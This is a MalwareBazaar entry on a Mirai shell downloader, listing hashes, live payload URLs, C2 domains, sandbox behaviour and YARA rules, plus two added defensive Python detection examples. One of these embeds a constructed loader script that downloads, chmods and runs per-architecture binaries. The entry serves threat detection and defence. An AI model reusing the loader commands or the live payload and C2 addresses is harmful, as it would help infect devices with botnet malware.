MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 7

SHA256 hash: bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557
SHA3-384 hash: adce71720b218fc8fc49a355422d684acddbc61505e1be08ee112909087f3ab684b8887cc77332f34daa02a0d4c906a6
SHA1 hash: 125bc711aa827bb2f80f50ff4e09b3ed4d1f5320
MD5 hash: 6f7b8821e099f96dc33c2ee1172372b7
humanhash: cold-romeo-potato-fifteen
File name: 76d32be0.sh
Signature: Mirai
File size: 4'737 bytes
First seen: 2026-03-28 03:17:45 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 48:vpK8KMV4kCpKDK1V4OpKrOKrWV4ZpKQKoV4HpKE0KEEV4EbpKUKkV47pKDK1V4OQ:v3IdDbcXATGEpb7aFHjRfsjCtBr9jq/z
TLSH: T143A1D2E974B4936A2DA1ED7371D6C942F14060A7E4C91D0AE6D2F0E4488DF61F484B82
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URLs associated with this sample (dropped payloads). All 14 entries carry the signature Mirai and the tags elf mirai ua-wget; they differ only in the architecture suffix of the file name.

Base URL: http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.<arch>

arch   SHA256 of the payload
x86    c2255234f1a3d8b59014fd1b5bf43119aa164349f135d7c4a5595301e62d930e
mips   c88e8314b162dd34a64a8486b16f532d1c49cd472b3445c9e5c9c78f2bbaf2f4
mpsl   f512aa138d45a334b5158b527ddeb2009d8192b007840a172f035b2f9c41a55f
arm    962b3b3843cf7519d82f748d09ddbc63817ddc23418211281913fb25b54b391a
arm5   269a363ff2eb073049f31948d48086c4fd115d7942535a0f82d3ba6eb0baa4b2
arm6   7fec9a423202af508020fc2d69e5ee58ffe608f3950495b92bc1eea7a7e68e0c
arm7   0ba78d70d0dd96d14a2a0baaeecec89b5a6c1e3ac5bc6c5996b55efe3e37eb35
ppc    11c68617eaeaa09ac2f7842667db1dfd2e39d061a2e48352f26102b7dfb9c85a
m68k   c990fae684b215cdedd79223ac1e0da674ae011cbd63caa8e7b0f67db871ebb1
spc    55db943ff242b32de9dc9fa31473a4b849ca92dcee182a2d8265053f4bd67c74
i686   94da95cad09a71040570af0d28e8f7a02f759e2201133f83550dce6aacec3a3c
sh4    7d235334a669faa5d2b6e1c1b1bd59f38af7bc555a69e17c732617ed101ff055
arc    baa57a1cc7595718da139ceba6afa34f4dbbcda23757c6139a9c15abfe024975
x64    43b395eaf6d796cec36c1c3999939022a705f91597c403ecf31b1adb0ec80cf7
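The URL list above collapses naturally into one network indicator: a single staging host and directory, with the file suffix telling you which architecture a victim pulled. The script below, an added example that is not code from MalwareBazaar or abuse.ch, builds that indicator from the 14 URLs in the entry and runs it over a few constructed HTTP proxy log lines. Only the URLs come from the entry; the log format, the client addresses and the match logic are assumptions made for illustration.

```python
"""Added example: the dropped-payload URL list above as IOCs, matched against
constructed HTTP proxy log lines. Not code from MalwareBazaar or abuse.ch.
Only the URLs come from the entry; the log format, client addresses and the
matching rules are assumptions made for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# The 14 per-architecture payload URLs listed in the entry.
ARCHES = ("x86", "mips", "mpsl", "arm", "arm5", "arm6", "arm7",
          "ppc", "m68k", "spc", "i686", "sh4", "arc", "x64")
PAYLOAD_URLS = [
    "http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/"
    "db0fa4b8db0333367e9bda3ab68b8042." + arch
    for arch in ARCHES
]


@dataclass(frozen=True)
class LoaderIOC:
    host: str            # staging host exactly as it appears in the URL
    path_prefix: str     # staging directory shared by every architecture
    arches: frozenset[str]


def build_ioc(urls: list[str]) -> LoaderIOC:
    """Collapse per-architecture URLs into one host + directory indicator.

    Matching on the directory rather than the full URL also catches a payload
    renamed or rebuilt for an architecture that is not in the list."""
    hosts, prefixes, arches = set(), set(), set()
    for url in urls:
        parts = urlsplit(url)
        directory, _, filename = parts.path.rpartition("/")
        hosts.add(parts.netloc)
        prefixes.add(directory + "/")
        arches.add(filename.rsplit(".", 1)[-1])
    if len(hosts) != 1 or len(prefixes) != 1:
        raise ValueError("expected one staging host and one directory")
    return LoaderIOC(hosts.pop(), prefixes.pop(), frozenset(arches))


# Constructed log lines: "<epoch> <client> <method> <url> <status> <user-agent>".
SAMPLE_LOG = """\
1774667865 10.0.0.7 GET http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7 200 Wget/1.21.3
1774667866 10.0.0.7 GET http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips 200 curl/8.5.0
1774667870 10.0.0.9 GET http://www.example.com/index.html 200 Mozilla/5.0
1774667871 10.0.0.7 GET http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/other.bin 404 Wget/1.21.3
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<ua>.*)$"
)


def scan_log(text: str, ioc: LoaderIOC) -> list[dict]:
    """Return one record per request that reached the staging directory."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if parts.netloc != ioc.host or not parts.path.startswith(ioc.path_prefix):
            continue
        suffix = parts.path.rsplit(".", 1)[-1]
        hits.append({
            "client": m["client"],
            "url": m["url"],
            # architecture the victim pulled; None for a file not in the list
            "arch": suffix if suffix in ioc.arches else None,
            # the entry tags every payload ua-wget; the sandbox run also used curl
            "downloader_ua": m["ua"].split("/", 1)[0].lower() in ("wget", "curl"),
            # a 200 means the binary actually landed on the client
            "fetched": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, build_ioc(PAYLOAD_URLS)):
        print(hit)
```

The fourth constructed line shows why the indicator is the directory and not the 14 full URLs: a request for an unlisted file in the same staging directory is still worth a ticket, and the arch field being None tells the analyst it is a file the entry does not cover.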

Intelligence

File Origin
# of uploads: 1
# of downloads: 49
Origin country: DE

Vendor Threat Intelligence
No detections
Result: Gathering data
Status: terminated
Behavior Graph (condensed from the sandbox's rendered process and network graph; only the node and edge labels survive, so the tree and its network endpoints are reproduced here in place of the image):

  /usr/bin/sudo (pid 3229)
    execve -> /tmp/sample.bin (pid 3230), which in turn launches:
      /usr/bin/wget  [net, send-data, write-file]  -> 176.65.139.80:80 (197 B sent)
      /usr/bin/curl  [net, send-data, write-file]  -> 176.65.139.80:80 (146 B sent)
      /usr/bin/cat
      /usr/bin/chmod
      /tmp/76d32be0  [net]  (the dropped payload)
        clone -> /tmp/76d32be0  [dns, net, send-data, zombie]
                   -> 8.8.8.8:53 (28 B, DNS lookup)
                   -> cnc.504.su:56999 (12 B, C2 check-in)
                   clone -> /tmp/76d32be0  [net, net-scan, send-data], two per generation,
                            each sending to between 320 and 4,097 IP addresses
                            ("review logs to see them all"); one scanner sends 40 B
                            to 194.39.112.213:23
        later instances additionally connect to 0.0.0.0:46157
      /usr/bin/wget  -> cnc.504.su:80 (198 B sent)
      /usr/bin/curl  -> cnc.504.su:80 (147 B sent)
      /usr/bin/bash  (clone)

  The wget, curl, bash, chmod, /tmp/76d32be0 sequence repeats six further times during the run (pids 3259 through 5351), each time spawning a fresh DNS, C2 and scanner process group.
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2026-03-28 03:18:21 UTC
File Type: Text (Shell)
AV detection: 23 of 36 (63.89%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai botnet:unstable antivm botnet defense_evasion discovery linux
Behaviour:
  Reads runtime system information
  System Network Configuration Discovery
  Writes file to tmp directory
  Changes its process name
  Checks CPU configuration
  Reads system network configuration
  Enumerates active TCP sockets
  Enumerates running processes
  Writes file to system bin folder
  File and Directory Permissions Modification
  Executes dropped EXE
  Modifies Watchdog functionality
  Contacts a large number (62,011) of remote hosts
  Creates a large number of network flows
  Mirai
  Mirai family
Malware Config
C2 Extraction:
  cnc.504.su
  scan.504.su
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
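The second rule's description names the three traits that make a script a multi-architecture loader: a download whose host is a bare numeric IP, a chmod, and execution of several architecture-specific payloads. The script below is an added example of checking a shell script statically for exactly those traits; it is not either YARA rule above, and it does not reproduce this sample's contents. The loader and benign scripts it triages are constructed (using an RFC 5737 documentation address), and the regexes and the scoring are assumptions.

```python
"""Added example: static triage of a shell script for the three traits named
in the MAL_Linux_IoT_MultiArch_BotnetLoader_Generic description (download
from a numeric IP, chmod, execution of several architecture-specific
payloads). This is not either YARA rule above; both script texts are
constructed for illustration and are not the contents of this sample."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Architecture suffixes seen on Mirai-style multi-arch payload sets.
ARCH_SUFFIXES = {"x86", "x64", "i686", "mips", "mpsl", "arm", "arm5", "arm6",
                 "arm7", "ppc", "m68k", "spc", "sh4", "arc"}

# wget/curl command whose URL host is a dotted quad rather than a hostname.
FETCH_RE = re.compile(
    r"\b(?:wget|curl)\b[^\n;|&]*?"
    r"(?P<url>https?://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})[^\s;|&'\"]*)"
)
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\s+(?P<target>[^\s;|&]+)")
# Relative execution of a file in the working directory: "./name".
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./(?P<name>[^\s;|&]+)", re.MULTILINE)


@dataclass
class Triage:
    download_ips: set[str] = field(default_factory=set)
    download_urls: list[str] = field(default_factory=list)
    chmod_targets: list[str] = field(default_factory=list)
    executed: list[str] = field(default_factory=list)
    arches: set[str] = field(default_factory=set)

    @property
    def loader_score(self) -> int:
        """0 to 3: numeric-IP download, chmod, two or more architectures."""
        return (int(bool(self.download_ips))
                + int(bool(self.chmod_targets))
                + int(len(self.arches) >= 2))


def triage_script(text: str) -> Triage:
    """Collect the loader traits present in a shell script's text."""
    t = Triage()
    for m in FETCH_RE.finditer(text):
        t.download_ips.add(m["ip"])
        t.download_urls.append(m["url"])
        suffix = m["url"].rsplit(".", 1)[-1]
        if suffix in ARCH_SUFFIXES:
            t.arches.add(suffix)
    t.chmod_targets = [m["target"] for m in CHMOD_RE.finditer(text)]
    t.executed = [m["name"] for m in EXEC_RE.finditer(text)]
    return t


# Constructed loader modelled on the behaviour the entry describes (not the sample).
LOADER_SCRIPT = """\
#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://203.0.113.10/bins/bot.x86 -O x86; chmod +x x86; ./x86; rm -f x86
wget http://203.0.113.10/bins/bot.mips -O mips; chmod +x mips; ./mips; rm -f mips
curl -O http://203.0.113.10/bins/bot.arm7; chmod 777 bot.arm7; ./bot.arm7; rm -f bot.arm7
wget http://203.0.113.10/bins/bot.x64 -O x64; chmod +x x64; ./x64; rm -f x64
"""

# Constructed benign script: a download from a hostname, a chmod, no execution.
BENIGN_SCRIPT = """\
#!/bin/sh
curl -fsSL https://www.example.com/config.json -o /etc/app/config.json
chmod 600 /etc/app/config.json
"""


if __name__ == "__main__":
    for name, script in (("loader", LOADER_SCRIPT), ("benign", BENIGN_SCRIPT)):
        t = triage_script(script)
        print(name, t.loader_score, sorted(t.arches), t.download_ips)
```

The benign script still scores one trait (the chmod), which is the point of scoring rather than matching on any single command: chmod and even curl from a numeric IP occur in legitimate provisioning, but fetching four differently suffixed binaries from one dotted-quad host and running each in turn does not.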

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery chain:
  Web download
    Mirai
      sh  bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557  (this sample)

Delivery method: Distributed via web download